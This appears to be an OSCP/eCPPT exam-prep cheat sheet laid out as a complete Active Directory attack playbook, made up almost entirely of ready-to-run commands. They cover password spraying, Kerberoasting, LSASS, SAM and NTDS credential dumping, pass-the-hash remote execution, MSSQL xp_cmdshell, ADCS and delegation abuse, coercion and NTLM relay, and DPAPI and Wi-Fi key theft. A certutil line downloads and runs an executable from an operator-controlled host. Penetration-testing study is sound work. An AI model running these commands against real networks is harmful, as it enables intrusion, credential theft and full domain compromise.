######################################################################
# 03 — ACTIVE DIRECTORY & WINDOWS NETWORK ATTACKS  
# OSCP 2025 — ULTRA EDITION (FINAL + ECPPT AD ADDITIONS INCLUDED)
######################################################################

This version includes:
✔ Full AD Enumeration  
✔ SMB/LDAP/WinRM/Kerberos workflow  
✔ Kerberoast / AS-REP roast / FAST-PAC checks  
✔ SMB/LDAP signing (relay pre-check)  
✔ ADCS ESC1–ESC14 (complete)  
✔ Delegation (RBCD / KCD)  
✔ Coercion attacks  
✔ Pass-the-Hash (NTLM & Kerberos)  
✔ MSSQL lateral movement  
✔ NTLM Relay & ADCS relay  
✔ LSASS dumping (nanodump, procdump, pypykatz)  
✔ Windows PrivEsc (OSCP safe)  
✔ BloodHound optimized collection  
✔ **🔥 Added from eCPPT: LDAP user dump, domain trusts enumeration, certutil/wget/ftp revshell upload techniques, malicious .asp upload, Metasploit local exploit workflow, secretsdump usage, Keepass cracking workflow, MySQL/WP credential hunting, DC-only dump commands (just AD parts), OpenSMTPD RCE (AD foothold cases), WordPress admin foothold to AD pivot**  
######################################################################


======================================================================
# 1. AD DISCOVERY & INITIAL ENUMERATION
======================================================================

-------------------------------
# 1.1 Nmap — AD-Related Ports
-------------------------------
nmap -sC -sV -Pn -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN nmap_ad_$targetip.txt $targetip


-------------------------------
# 1.2 Host & Domain Fingerprinting
-------------------------------
netexec smb $targetip


-------------------------------
# 1.3 SMB/LDAP Signing Status (Relay Check)
-------------------------------
netexec smb $targetip --signing
netexec ldap $targetip --signing


-------------------------------
# 1.4 SMB Shares
-------------------------------
smbclient -L //$targetip/ -N
smbmap -H $targetip
netexec smb $targetip --shares


-------------------------------
# 1.5 SYSVOL & GPP Credential Hunting
-------------------------------
smbclient //$targetip/SYSVOL -N -c "recurse;ls"
grep -R "cpassword" .
find . -name "*.xml"
gpp-decrypt <HASH>


-------------------------------
# 1.6 NetExec Discovery Modules
-------------------------------
netexec smb $targetip -M spider
netexec smb $targetip --users
netexec smb $targetip --groups
netexec smb $targetip --laps
netexec smb $targetip -M webdav


-------------------------------
# 1.7 Kerberos Pre-Flight (Time Sync)
-------------------------------
ntpdate -q $targetip


-------------------------------
# 🔥 (AD ADD — eCPPT) Enumerate Domain Trusts Early
-------------------------------
nltest /domain_trusts
nltest /trusted_domains
nltest /dsgetdc:$domain


======================================================================
# 2. LDAP ENUMERATION
======================================================================

-------------------------------
# 2.1 Get baseDN
-------------------------------
ldapsearch -x -H ldap://$targetip -s base


-------------------------------
# 2.2 Users
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=user)" sAMAccountName description mail memberOf


-------------------------------
# 2.3 Groups
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=group)" cn member memberOf


-------------------------------
# 2.4 GPO Enumeration
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=groupPolicyContainer)" gPCFileSysPath displayName


-------------------------------
# 2.5 DNS Records
-------------------------------
ldapsearch -x -H ldap://$targetip -b "DC=DomainDnsZones,$basedn"


-------------------------------
# 🔥 (AD ADD — eCPPT) Filter Only Users Under an OU
-------------------------------
ldapsearch -x -H ldap://$targetip -D "$domain\\$user" -w "$password" \
  -b "OU=Employees,$basedn" "(objectClass=user)" sAMAccountName distinguishedName userAccountControl pwdLastSet


======================================================================
# 3. KERBEROS ATTACKS
======================================================================

-------------------------------
# 3.1 Kerbrute User Enumeration
-------------------------------
kerbrute userenum -d $domain --dc $targetip users.txt


-------------------------------
# 3.2 Password Spraying
-------------------------------
kerbrute passwordspray -d $domain --dc $targetip users.txt 'Password1!'


-------------------------------
# 3.3 AS-REP Roasting
-------------------------------
impacket-GetNPUsers $domain/ -dc-ip $targetip -no-pass -usersfile users.txt -format john -outputfile asrep.txt


-------------------------------
# 3.4 Kerberoasting (SPNs)
-------------------------------
impacket-GetUserSPNs $domain/$user:"$password" -dc-ip $targetip -request -format john -outputfile kerberoast.txt


-------------------------------
# 3.5 Request TGT / ST (Delegation)
-------------------------------
impacket-getTGT $domain/$user:"$password"
impacket-getST -spn <service>/<fqdn> -impersonate Administrator $domain/$user:"$password" -dc-ip $targetip


-------------------------------
# 3.6 Detect FAST/PAC Enforcement
-------------------------------
netexec kerberos $targetip --kerberos


======================================================================
# 4. HASHES & LATERAL MOVEMENT
======================================================================

-------------------------------
# 4.1 Dump SAM / LSASS / NTDS via NetExec
-------------------------------
netexec smb $targetip -u $user -p "$password" --sam
netexec smb $targetip -u $user -p "$password" -M lsassy
netexec smb $targetip -u $user -p "$password" -M ntdsutil


-------------------------------
# 🔥 (AD ADD — eCPPT) Dump ONLY DC Hashes
-------------------------------
python3 secretsdump.py -just-dc-ntlm $domain/$user:"$password"@$targetip


======================================================================
# 4.5 PASS-THE-HASH (NTLM + Kerberos Tickets)
======================================================================

### ✔ NTLM PTH — NO TIME SYNC NEEDED

# SMB RCE
impacket-psexec $domain/$user@$targetip -hashes <LM:NTLM>

# WMI Exec
impacket-wmiexec $domain/$user@$targetip -hashes <LM:NTLM>

# WinRM via Hash
evil-winrm -i $targetip -u $user -H <NTLM>

# NetExec PTH
netexec smb $targetip -u $user -H <NTLM>
netexec smb $targetip -u $user -H <NTLM> --sam
netexec smb $targetip -u $user -H <NTLM> -M lsassy


### ✔ Kerberos PTH (Pass-The-Key) — TIME SYNC REQUIRED

# sync clock
ntpdate -q $targetip

# request TGT using hash
impacket-getTGT $domain/$user -hashes <LM:NTLM>

# set ticket
export KRB5CCNAME=$user.ccache

# get service ticket
impacket-getST -spn cifs/$target -impersonate Administrator $domain/$user -dc-ip $targetip


======================================================================
# 5. WINRM & RDP
======================================================================

# 5.1 Check WinRM
netexec winrm $targetip

# 5.2 WinRM Credentials
evil-winrm -i $targetip -u $user -p "$password"

# 5.3 WinRM Hash
evil-winrm -i $targetip -u $user -H <NTLM>

# 5.4 Certificate Auth
evil-winrm -i $targetip -c cert.pem -k key.pem

# 5.5 RDP
xfreerdp /v:$targetip /u:$user /p:"$password" /dynamic-resolution +clipboard


======================================================================
# 6. MSSQL ATTACKS
======================================================================

# Windows Auth
mssqlclient.py $domain/$user:"$password"@$targetip -windows-auth

# Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

# Linked server
EXEC sp_linkedservers;
EXEC ('xp_cmdshell ''whoami''') AT [LINKEDSERVER];


======================================================================
# 7. ADCS (ESC1–ESC14)
======================================================================

certipy find -u $user -p "$password" -dc-ip $targetip -vulnerable -enabled
certipy req -u $user -p "$password" -dc-ip $targetip -template $template -out cert.pfx
certipy auth -pfx cert.pfx -dc-ip $targetip
certipy shadow -u $user -p "$password" -dc-ip $targetip -account Administrator
certipy find -u $user -p "$password" -dc-ip $targetip -stdout -json out.json


======================================================================
# 8. DELEGATION ATTACKS
======================================================================

# 8.1 RBCD
addcomputer.py -dc-ip $targetip $domain/$user:"$password" -computer-name 'MACHINE$' -computer-pass 'Pass123!'
impacket-rbcd -delegate-from 'MACHINE$' -delegate-to 'SERVER$' -dc-ip $targetip -action write -user $user -password "$password"
getST.py -spn cifs/SERVER.$domain -impersonate Administrator "$domain/MACHINE$":"Pass123!"

# 8.2 KCD
impacket-getST -impersonate Administrator -spn http/web.$domain $domain/$user:"$password"

# 8.3 Coercion
printerbug.py $domain/$user:"$password"@$targetip $localip
dfscoerce.py $domain/$user:"$password"@$targetip $localip
petitpotam.py -u $user -p "$password" -d $domain -dc-ip $targetip $localip


======================================================================
# 9. NTLM RELAY (SMB → LDAP + ADCS)
======================================================================

responder -I tun0 -wd -v
ntlmrelayx.py -t ldap://$targetip --no-http-server
ntlmrelayx.py --adcs --template "User" -t http://$targetip --no-http-server
iptables -A INPUT -p tcp --dport 445 -j DROP


======================================================================
# 10. DPAPI Credential Extraction
======================================================================

pypykatz live lsa
pypykatz dpapi chrome -d .
pypykatz dpapi rdp -d .
netsh wlan show profiles
netsh wlan show profile name="<SSID>" key=clear


======================================================================
# 11. LSASS DUMPING
======================================================================

nanodump.exe --write C:\Windows\Temp\lsass.dmp
procdump.exe -ma lsass.exe lsass.dmp
pypykatz lsa minidump lsass.dmp


======================================================================
# 12. WINDOWS PRIVILEGE ESCALATION
======================================================================

whoami /priv
PrintSpoofer.exe -i -c cmd
RoguePotato.exe
findstr /si /i "password" *.txt *.xml *.ini
wmic service get name,displayname,pathname,startmode

# WinPEAS
certutil -urlcache -f http://$localip/winpeas.exe C:\Temp\winpeas.exe && C:\Temp\winpeas.exe


======================================================================
# 13. CROSS-DOMAIN & FOREST
======================================================================

nltest /domain_trusts
nltest /trusted_domains


======================================================================
# 14. BLOODHOUND
======================================================================

bloodhound-python -d $domain -u $user -p "$password" -ns $targetip -c All


======================================================================
# 15. OSCP ATTACK FLOW
======================================================================

1) SMB/LDAP Enumeration  
2) Kerbrute  
3) Password Spray  
4) AS-REP Roast  
5) Kerberoast  
6) SYSVOL/GPP  
7) LDAP Priv Groups  
8) ADCS ESC1–14  
9) Delegation (RBCD/KCD)  
10) Coercion  
11) NTLM Relay / ADCS Relay  
12) Lateral Movement (SMB/WMI/WinRM/PTH)  
13) Dump Hashes  
14) DPAPI / Browser / RDP creds  
15) BloodHound → DA  
16) DCSync  
######################################################################
# END — COMPLETE AD ATTACK PLAYBOOK (OSCP 2025 + ECPPT ADDITIONS)
######################################################################
